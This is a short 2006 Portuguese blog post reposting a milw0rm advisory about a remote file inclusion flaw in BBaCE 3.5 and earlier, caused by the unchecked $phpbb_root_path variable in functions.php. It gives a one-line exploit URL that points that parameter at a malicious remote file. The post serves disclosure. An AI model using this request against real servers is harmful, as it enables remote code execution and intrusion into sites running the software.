segunda-feira, outubro 02, 2006

BBaCE 3.5 - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $phpbb_root_path= do arquivo functions.php permite a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: BBaCE 3.5 e anteriores
Download: bbace.blogspot.com
Código vulnerável (functions.php):
indisponível
Desoberta por: SpiderZ
Exploit:
http://host/includes/functions.php?phpbb_root_path=arquivomaligno?
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: milw0rm.com
Postado por às

Nenhum comentário:

Postar um comentário

Assinar: Postar comentários (Atom)